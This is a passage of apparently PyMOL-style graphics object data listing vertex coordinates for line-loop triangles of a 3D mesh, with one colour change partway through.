VERTEX, 21.049, 26.217, 26.156,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.225, 26.068, 26.199,
VERTEX, 21.049, 26.217, 26.156,
VERTEX, 20.742, 25.668, 26.433,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.049, 26.217, 26.156,
VERTEX, 20.742, 25.668, 26.433,
VERTEX, 20.566, 25.822, 26.400,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.742, 25.668, 26.433,
VERTEX, 20.566, 25.822, 26.400,
VERTEX, 20.132, 25.216, 26.949,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.566, 25.822, 26.400,
VERTEX, 20.132, 25.216, 26.949,
VERTEX, 19.960, 25.379, 26.929,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.132, 25.216, 26.949,
VERTEX, 19.960, 25.379, 26.929,
VERTEX, 19.752, 24.976, 27.446,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.960, 25.379, 26.929,
VERTEX, 19.752, 24.976, 27.446,
VERTEX, 19.586, 25.146, 27.432,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.752, 24.976, 27.446,
VERTEX, 19.586, 25.146, 27.432,
VERTEX, 19.825, 25.090, 27.631,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.586, 25.146, 27.432,
VERTEX, 19.825, 25.090, 27.631,
VERTEX, 19.662, 25.260, 27.616,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.662, 25.260, 27.616,
VERTEX, 19.482, 25.449, 27.600,
VERTEX, 20.145, 25.655, 27.372,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.482, 25.449, 27.600,
VERTEX, 20.145, 25.655, 27.372,
VERTEX, 19.962, 25.839, 27.345,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.145, 25.655, 27.372,
VERTEX, 19.962, 25.839, 27.345,
VERTEX, 20.751, 26.099, 26.844,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.962, 25.839, 27.345,
VERTEX, 20.751, 26.099, 26.844,
VERTEX, 20.563, 26.273, 26.802,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.751, 26.099, 26.844,
VERTEX, 20.563, 26.273, 26.802,
VERTEX, 21.125, 26.332, 26.340,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.563, 26.273, 26.802,
VERTEX, 21.125, 26.332, 26.340,
VERTEX, 20.932, 26.497, 26.291,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.125, 26.332, 26.340,
VERTEX, 20.932, 26.497, 26.291,
VERTEX, 21.049, 26.217, 26.156,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.932, 26.497, 26.291,
VERTEX, 21.049, 26.217, 26.156,
VERTEX, 20.854, 26.380, 26.110,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.049, 26.217, 26.156,
VERTEX, 20.854, 26.380, 26.110,
VERTEX, 20.566, 25.822, 26.400,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.854, 26.380, 26.110,
VERTEX, 20.566, 25.822, 26.400,
VERTEX, 20.374, 25.990, 26.365,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.566, 25.822, 26.400,
VERTEX, 20.374, 25.990, 26.365,
VERTEX, 19.960, 25.379, 26.929,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.374, 25.990, 26.365,
VERTEX, 19.960, 25.379, 26.929,
VERTEX, 19.773, 25.555, 26.908,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.960, 25.379, 26.929,
VERTEX, 19.773, 25.555, 26.908,
VERTEX, 19.586, 25.146, 27.432,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.773, 25.555, 26.908,
VERTEX, 19.586, 25.146, 27.432,
VERTEX, 19.404, 25.331, 27.419,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.586, 25.146, 27.432,
VERTEX, 19.404, 25.331, 27.419,
VERTEX, 19.662, 25.260, 27.616,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.404, 25.331, 27.419,
VERTEX, 19.662, 25.260, 27.616,
VERTEX, 19.482, 25.449, 27.600,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.482, 25.449, 27.600,
VERTEX, 19.268, 25.672, 27.578,
VERTEX, 19.962, 25.839, 27.345,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.268, 25.672, 27.578,
VERTEX, 19.962, 25.839, 27.345,
VERTEX, 19.744, 26.058, 27.309,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.962, 25.839, 27.345,
VERTEX, 19.744, 26.058, 27.309,
VERTEX, 20.563, 26.273, 26.802,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.744, 26.058, 27.309,
VERTEX, 20.563, 26.273, 26.802,
VERTEX, 20.337, 26.481, 26.750,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.563, 26.273, 26.802,
VERTEX, 20.337, 26.481, 26.750,
VERTEX, 20.932, 26.497, 26.291,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.337, 26.481, 26.750,
VERTEX, 20.932, 26.497, 26.291,
VERTEX, 20.700, 26.694, 26.229,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.932, 26.497, 26.291,
VERTEX, 20.700, 26.694, 26.229,
VERTEX, 20.854, 26.380, 26.110,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.700, 26.694, 26.229,
VERTEX, 20.854, 26.380, 26.110,
VERTEX, 20.620, 26.572, 26.052,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.854, 26.380, 26.110,
VERTEX, 20.620, 26.572, 26.052,
VERTEX, 20.374, 25.990, 26.365,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.620, 26.572, 26.052,
VERTEX, 20.374, 25.990, 26.365,
VERTEX, 20.145, 26.186, 26.322,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.374, 25.990, 26.365,
VERTEX, 20.145, 26.186, 26.322,
VERTEX, 19.773, 25.555, 26.908,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.145, 26.186, 26.322,
VERTEX, 19.773, 25.555, 26.908,
VERTEX, 19.551, 25.762, 26.881,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.773, 25.555, 26.908,
VERTEX, 19.551, 25.762, 26.881,
VERTEX, 19.404, 25.331, 27.419,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.551, 25.762, 26.881,
VERTEX, 19.404, 25.331, 27.419,
VERTEX, 19.188, 25.549, 27.401,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.404, 25.331, 27.419,
VERTEX, 19.188, 25.549, 27.401,
VERTEX, 19.482, 25.449, 27.600,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.188, 25.549, 27.401,
VERTEX, 19.482, 25.449, 27.600,
VERTEX, 19.268, 25.672, 27.578,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.268, 25.672, 27.578,
VERTEX, 19.003, 25.945, 27.545,
VERTEX, 19.744, 26.058, 27.309,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.003, 25.945, 27.545,
VERTEX, 19.744, 26.058, 27.309,
VERTEX, 19.472, 26.325, 27.258,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.744, 26.058, 27.309,
VERTEX, 19.472, 26.325, 27.258,
VERTEX, 20.337, 26.481, 26.750,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.472, 26.325, 27.258,
VERTEX, 20.337, 26.481, 26.750,
VERTEX, 20.056, 26.736, 26.680,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.337, 26.481, 26.750,
VERTEX, 20.056, 26.736, 26.680,
VERTEX, 20.700, 26.694, 26.229,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.056, 26.736, 26.680,
VERTEX, 20.700, 26.694, 26.229,
VERTEX, 20.411, 26.936, 26.148,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.700, 26.694, 26.229,
VERTEX, 20.411, 26.936, 26.148,
VERTEX, 20.620, 26.572, 26.052,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.411, 26.936, 26.148,
VERTEX, 20.620, 26.572, 26.052,
VERTEX, 20.330, 26.808, 25.976,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.620, 26.572, 26.052,
VERTEX, 20.330, 26.808, 25.976,
VERTEX, 20.145, 26.186, 26.322,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.330, 26.808, 25.976,
VERTEX, 20.145, 26.186, 26.322,
VERTEX, 19.860, 26.427, 26.263,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.145, 26.186, 26.322,
VERTEX, 19.860, 26.427, 26.263,
VERTEX, 19.551, 25.762, 26.881,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.860, 26.427, 26.263,
VERTEX, 19.551, 25.762, 26.881,
VERTEX, 19.277, 26.016, 26.842,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.551, 25.762, 26.881,
VERTEX, 19.277, 26.016, 26.842,
VERTEX, 19.188, 25.549, 27.401,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.277, 26.016, 26.842,
VERTEX, 19.188, 25.549, 27.401,
VERTEX, 18.922, 25.817, 27.373,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.188, 25.549, 27.401,
VERTEX, 18.922, 25.817, 27.373,
VERTEX, 19.268, 25.672, 27.578,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.922, 25.817, 27.373,
VERTEX, 19.268, 25.672, 27.578,
VERTEX, 19.003, 25.945, 27.545,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.003, 25.945, 27.545,
VERTEX, 18.671, 26.284, 27.496,
VERTEX, 19.472, 26.325, 27.258,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.671, 26.284, 27.496,
VERTEX, 19.472, 26.325, 27.258,
VERTEX, 19.133, 26.657, 27.187,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.472, 26.325, 27.258,
VERTEX, 19.133, 26.657, 27.187,
VERTEX, 20.056, 26.736, 26.680,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.133, 26.657, 27.187,
VERTEX, 20.056, 26.736, 26.680,
VERTEX, 19.703, 27.052, 26.585,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.056, 26.736, 26.680,
VERTEX, 19.703, 27.052, 26.585,
VERTEX, 20.411, 26.936, 26.148,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.703, 27.052, 26.585,
VERTEX, 20.411, 26.936, 26.148,
VERTEX, 20.046, 27.236, 26.041,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.411, 26.936, 26.148,
VERTEX, 20.046, 27.236, 26.041,
VERTEX, 20.330, 26.808, 25.976,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.046, 27.236, 26.041,
VERTEX, 20.330, 26.808, 25.976,
VERTEX, 19.962, 27.103, 25.874,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.330, 26.808, 25.976,
VERTEX, 19.962, 27.103, 25.874,
VERTEX, 19.860, 26.427, 26.263,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.962, 27.103, 25.874,
VERTEX, 19.860, 26.427, 26.263,
VERTEX, 19.500, 26.729, 26.182,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.860, 26.427, 26.263,
VERTEX, 19.500, 26.729, 26.182,
VERTEX, 19.277, 26.016, 26.842,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.500, 26.729, 26.182,
VERTEX, 19.277, 26.016, 26.842,
VERTEX, 18.930, 26.335, 26.785,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.277, 26.016, 26.842,
VERTEX, 18.930, 26.335, 26.785,
VERTEX, 18.922, 25.817, 27.373,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.930, 26.335, 26.785,
VERTEX, 18.922, 25.817, 27.373,
VERTEX, 18.587, 26.150, 27.329,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.922, 25.817, 27.373,
VERTEX, 18.587, 26.150, 27.329,
VERTEX, 19.003, 25.945, 27.545,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.587, 26.150, 27.329,
VERTEX, 19.003, 25.945, 27.545,
VERTEX, 18.671, 26.284, 27.496,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.671, 26.284, 27.496,
VERTEX, 18.339, 26.626, 27.439,
VERTEX, 19.133, 26.657, 27.187,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.339, 26.626, 27.439,
VERTEX, 19.133, 26.657, 27.187,
VERTEX, 18.795, 26.990, 27.111,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.133, 26.657, 27.187,
VERTEX, 18.795, 26.990, 27.111,
VERTEX, 19.703, 27.052, 26.585,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.795, 26.990, 27.111,
VERTEX, 19.703, 27.052, 26.585,
VERTEX, 19.350, 27.369, 26.485,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.703, 27.052, 26.585,
VERTEX, 19.350, 27.369, 26.485,
VERTEX, 20.046, 27.236, 26.041,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.350, 27.369, 26.485,
VERTEX, 20.046, 27.236, 26.041,
VERTEX, 19.681, 27.539, 25.928,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.046, 27.236, 26.041,
VERTEX, 19.681, 27.539, 25.928,
VERTEX, 19.962, 27.103, 25.874,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.681, 27.539, 25.928,
VERTEX, 19.962, 27.103, 25.874,
VERTEX, 19.593, 27.402, 25.767,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.962, 27.103, 25.874,
VERTEX, 19.593, 27.402, 25.767,
VERTEX, 19.500, 26.729, 26.182,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.593, 27.402, 25.767,
VERTEX, 19.500, 26.729, 26.182,
VERTEX, 19.137, 27.037, 26.095,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.500, 26.729, 26.182,
VERTEX, 19.137, 27.037, 26.095,
VERTEX, 18.930, 26.335, 26.785,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.137, 27.037, 26.095,
VERTEX, 18.930, 26.335, 26.785,
VERTEX, 18.581, 26.659, 26.721,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.930, 26.335, 26.785,
VERTEX, 18.581, 26.659, 26.721,
VERTEX, 18.587, 26.150, 27.329,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.581, 26.659, 26.721,
VERTEX, 18.587, 26.150, 27.329,
VERTEX, 18.251, 26.489, 27.278,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.587, 26.150, 27.329,
VERTEX, 18.251, 26.489, 27.278,
VERTEX, 18.671, 26.284, 27.496,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.251, 26.489, 27.278,
VERTEX, 18.671, 26.284, 27.496,
VERTEX, 18.339, 26.626, 27.439,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.339, 26.626, 27.439,
VERTEX, 18.075, 26.907, 27.389,
VERTEX, 18.795, 26.990, 27.111,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.075, 26.907, 27.389,
VERTEX, 18.795, 26.990, 27.111,
VERTEX, 18.525, 27.263, 27.045,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.795, 26.990, 27.111,
VERTEX, 18.525, 27.263, 27.045,
VERTEX, 19.350, 27.369, 26.485,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.525, 27.263, 27.045,
VERTEX, 19.350, 27.369, 26.485,
VERTEX, 19.070, 27.627, 26.401,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.350, 27.369, 26.485,
VERTEX, 19.070, 27.627, 26.401,
VERTEX, 19.681, 27.539, 25.928,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.070, 27.627, 26.401,
VERTEX, 19.681, 27.539, 25.928,
VERTEX, 19.389, 27.786, 25.835,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.681, 27.539, 25.928,
VERTEX, 19.389, 27.786, 25.835,
VERTEX, 19.593, 27.402, 25.767,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.389, 27.786, 25.835,
VERTEX, 19.593, 27.402, 25.767,
VERTEX, 19.297, 27.646, 25.678,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.593, 27.402, 25.767,
VERTEX, 19.297, 27.646, 25.678,
VERTEX, 19.137, 27.037, 26.095,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.297, 27.646, 25.678,
VERTEX, 19.137, 27.037, 26.095,
VERTEX, 18.846, 27.290, 26.022,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.137, 27.037, 26.095,
VERTEX, 18.846, 27.290, 26.022,
VERTEX, 18.581, 26.659, 26.721,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.846, 27.290, 26.022,
VERTEX, 18.581, 26.659, 26.721,
VERTEX, 18.302, 26.926, 26.666,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.581, 26.659, 26.721,
VERTEX, 18.302, 26.926, 26.666,
VERTEX, 18.251, 26.489, 27.278,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.302, 26.926, 26.666,
VERTEX, 18.251, 26.489, 27.278,
VERTEX, 17.982, 26.767, 27.232,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.251, 26.489, 27.278,
VERTEX, 17.982, 26.767, 27.232,
VERTEX, 18.339, 26.626, 27.439,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.982, 26.767, 27.232,
VERTEX, 18.339, 26.626, 27.439,
VERTEX, 18.075, 26.907, 27.389,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.075, 26.907, 27.389,
VERTEX, 17.860, 27.141, 27.345,
VERTEX, 18.525, 27.263, 27.045,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.860, 27.141, 27.345,
VERTEX, 18.525, 27.263, 27.045,
VERTEX, 18.306, 27.490, 26.988,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.525, 27.263, 27.045,
VERTEX, 18.306, 27.490, 26.988,
VERTEX, 19.070, 27.627, 26.401,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.306, 27.490, 26.988,
VERTEX, 19.070, 27.627, 26.401,
VERTEX, 18.841, 27.842, 26.330,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.070, 27.627, 26.401,
VERTEX, 18.841, 27.842, 26.330,
VERTEX, 19.389, 27.786, 25.835,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.841, 27.842, 26.330,
VERTEX, 19.389, 27.786, 25.835,
VERTEX, 19.152, 27.991, 25.756,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.389, 27.786, 25.835,
VERTEX, 19.152, 27.991, 25.756,
VERTEX, 19.297, 27.646, 25.678,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.152, 27.991, 25.756,
VERTEX, 19.297, 27.646, 25.678,
VERTEX, 19.056, 27.849, 25.603,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.297, 27.646, 25.678,
VERTEX, 19.056, 27.849, 25.603,
VERTEX, 18.846, 27.290, 26.022,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.056, 27.849, 25.603,
VERTEX, 18.846, 27.290, 26.022,
VERTEX, 18.610, 27.501, 25.960,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.846, 27.290, 26.022,
VERTEX, 18.610, 27.501, 25.960,
VERTEX, 18.302, 26.926, 26.666,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.610, 27.501, 25.960,
VERTEX, 18.302, 26.926, 26.666,
VERTEX, 18.075, 27.148, 26.618,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.302, 26.926, 26.666,
VERTEX, 18.075, 27.148, 26.618,
VERTEX, 17.982, 26.767, 27.232,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.075, 27.148, 26.618,
VERTEX, 17.982, 26.767, 27.232,
VERTEX, 17.764, 26.999, 27.192,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.982, 26.767, 27.232,
VERTEX, 17.764, 26.999, 27.192,
VERTEX, 18.075, 26.907, 27.389,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.764, 26.999, 27.192,
VERTEX, 18.075, 26.907, 27.389,
VERTEX, 17.860, 27.141, 27.345,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.860, 27.141, 27.345,
VERTEX, 17.678, 27.341, 27.306,
VERTEX, 18.306, 27.490, 26.988,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.678, 27.341, 27.306,
VERTEX, 18.306, 27.490, 26.988,
VERTEX, 18.120, 27.684, 26.939,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.306, 27.490, 26.988,
VERTEX, 18.120, 27.684, 26.939,
VERTEX, 18.841, 27.842, 26.330,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.120, 27.684, 26.939,
VERTEX, 18.841, 27.842, 26.330,
VERTEX, 18.647, 28.026, 26.269,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.841, 27.842, 26.330,
VERTEX, 18.647, 28.026, 26.269,
VERTEX, 19.152, 27.991, 25.756,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.647, 28.026, 26.269,
VERTEX, 19.152, 27.991, 25.756,
VERTEX, 18.950, 28.167, 25.688,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.152, 27.991, 25.756,
VERTEX, 18.950, 28.167, 25.688,
VERTEX, 19.056, 27.849, 25.603,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.950, 28.167, 25.688,
VERTEX, 19.056, 27.849, 25.603,
VERTEX, 18.852, 28.024, 25.538,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.056, 27.849, 25.603,
VERTEX, 18.852, 28.024, 25.538,
VERTEX, 18.610, 27.501, 25.960,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.852, 28.024, 25.538,
VERTEX, 18.610, 27.501, 25.960,
VERTEX, 18.410, 27.681, 25.906,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.610, 27.501, 25.960,
VERTEX, 18.410, 27.681, 25.906,
VERTEX, 18.075, 27.148, 26.618,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.410, 27.681, 25.906,
VERTEX, 18.075, 27.148, 26.618,
VERTEX, 17.883, 27.339, 26.576,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.075, 27.148, 26.618,
VERTEX, 17.883, 27.339, 26.576,
VERTEX, 17.764, 26.999, 27.192,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.883, 27.339, 26.576,
VERTEX, 17.764, 26.999, 27.192,
VERTEX, 17.580, 27.198, 27.156,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.764, 26.999, 27.192,
VERTEX, 17.580, 27.198, 27.156,
VERTEX, 17.860, 27.141, 27.345,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.580, 27.198, 27.156,
VERTEX, 17.860, 27.141, 27.345,
VERTEX, 17.678, 27.341, 27.306,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.678, 27.341, 27.306,
VERTEX, 17.513, 27.523, 27.272,
VERTEX, 18.120, 27.684, 26.939,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.513, 27.523, 27.272,
VERTEX, 18.120, 27.684, 26.939,
VERTEX, 17.951, 27.861, 26.894,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.120, 27.684, 26.939,
VERTEX, 17.951, 27.861, 26.894,
VERTEX, 18.647, 28.026, 26.269,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.951, 27.861, 26.894,
VERTEX, 18.647, 28.026, 26.269,
VERTEX, 18.469, 28.194, 26.213,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.647, 28.026, 26.269,
VERTEX, 18.469, 28.194, 26.213,
VERTEX, 18.950, 28.167, 25.688,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.469, 28.194, 26.213,
VERTEX, 18.950, 28.167, 25.688,
VERTEX, 18.764, 28.326, 25.627,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.950, 28.167, 25.688,
VERTEX, 18.764, 28.326, 25.627,
VERTEX, 18.852, 28.024, 25.538,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.764, 28.326, 25.627,
VERTEX, 18.852, 28.024, 25.538,
VERTEX, 18.664, 28.181, 25.480,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.852, 28.024, 25.538,
VERTEX, 18.664, 28.181, 25.480,
VERTEX, 18.410, 27.681, 25.906,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.664, 28.181, 25.480,
VERTEX, 18.410, 27.681, 25.906,
VERTEX, 18.227, 27.843, 25.858,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.410, 27.681, 25.906,
VERTEX, 18.227, 27.843, 25.858,
VERTEX, 17.883, 27.339, 26.576,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.227, 27.843, 25.858,
VERTEX, 17.883, 27.339, 26.576,
VERTEX, 17.709, 27.511, 26.539,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.883, 27.339, 26.576,
VERTEX, 17.709, 27.511, 26.539,
VERTEX, 17.580, 27.198, 27.156,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.709, 27.511, 26.539,
VERTEX, 17.580, 27.198, 27.156,
VERTEX, 17.413, 27.378, 27.125,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.580, 27.198, 27.156,
VERTEX, 17.413, 27.378, 27.125,
VERTEX, 17.678, 27.341, 27.306,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.413, 27.378, 27.125,
VERTEX, 17.678, 27.341, 27.306,
VERTEX, 17.513, 27.523, 27.272,
END,
COLOR, 0.000, 0.792, 1.000,
BEGIN, LINE_LOOP,
VERTEX, 17.513, 27.523, 27.272,
VERTEX, 17.349, 27.700, 27.241,
VERTEX, 17.951, 27.861, 26.894,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.349, 27.700, 27.241,
VERTEX, 17.951, 27.861, 26.894,
VERTEX, 17.779, 28.034, 26.852,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.951, 27.861, 26.894,
VERTEX, 17.779, 28.034, 26.852,
VERTEX, 18.469, 28.194, 26.213,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.779, 28.034, 26.852,
VERTEX, 18.469, 28.194, 26.213,
VERTEX, 18.288, 28.358, 26.159,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.469, 28.194, 26.213,
VERTEX, 18.288, 28.358, 26.159,
VERTEX, 18.764, 28.326, 25.627,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.288, 28.358, 26.159,
VERTEX, 18.764, 28.326, 25.627,
VERTEX, 18.575, 28.482, 25.567,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.764, 28.326, 25.627,
VERTEX, 18.575, 28.482, 25.567,
VERTEX, 18.664, 28.181, 25.480,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.575, 28.482, 25.567,
VERTEX, 18.664, 28.181, 25.480,
VERTEX, 18.474, 28.334, 25.424,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.664, 28.181, 25.480,
VERTEX, 18.474, 28.334, 25.424,
VERTEX, 18.227, 27.843, 25.858,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.474, 28.334, 25.424,
VERTEX, 18.227, 27.843, 25.858,
VERTEX, 18.043, 28.000, 25.813,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.227, 27.843, 25.858,
VERTEX, 18.043, 28.000, 25.813,
VERTEX, 17.709, 27.511, 26.539,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.043, 28.000, 25.813,
VERTEX, 17.709, 27.511, 26.539,
VERTEX, 17.535, 27.677, 26.506,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.709, 27.511, 26.539,
VERTEX, 17.535, 27.677, 26.506,
VERTEX, 17.413, 27.378, 27.125,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.535, 27.677, 26.506,
VERTEX, 17.413, 27.378, 27.125,
VERTEX, 17.247, 27.552, 27.098,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.413, 27.378, 27.125,
VERTEX, 17.247, 27.552, 27.098,
VERTEX, 17.513, 27.523, 27.272,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.247, 27.552, 27.098,
VERTEX, 17.513, 27.523, 27.272,
VERTEX, 17.349, 27.700, 27.241,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.349, 27.700, 27.241,
VERTEX, 17.168, 27.887, 27.212,
VERTEX, 17.779, 28.034, 26.852,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.168, 27.887, 27.212,
VERTEX, 17.779, 28.034, 26.852,
VERTEX, 17.590, 28.216, 26.811,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.779, 28.034, 26.852,
VERTEX, 17.590, 28.216, 26.811,
VERTEX, 18.288, 28.358, 26.159,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.590, 28.216, 26.811,
VERTEX, 18.288, 28.358, 26.159,
VERTEX, 18.086, 28.531, 26.105,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.288, 28.358, 26.159,
VERTEX, 18.086, 28.531, 26.105,
VERTEX, 18.575, 28.482, 25.567,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.086, 28.531, 26.105,
VERTEX, 18.575, 28.482, 25.567,
VERTEX, 18.364, 28.647, 25.507,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.575, 28.482, 25.567,
VERTEX, 18.364, 28.647, 25.507,
VERTEX, 18.474, 28.334, 25.424,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.364, 28.647, 25.507,
VERTEX, 18.474, 28.334, 25.424,
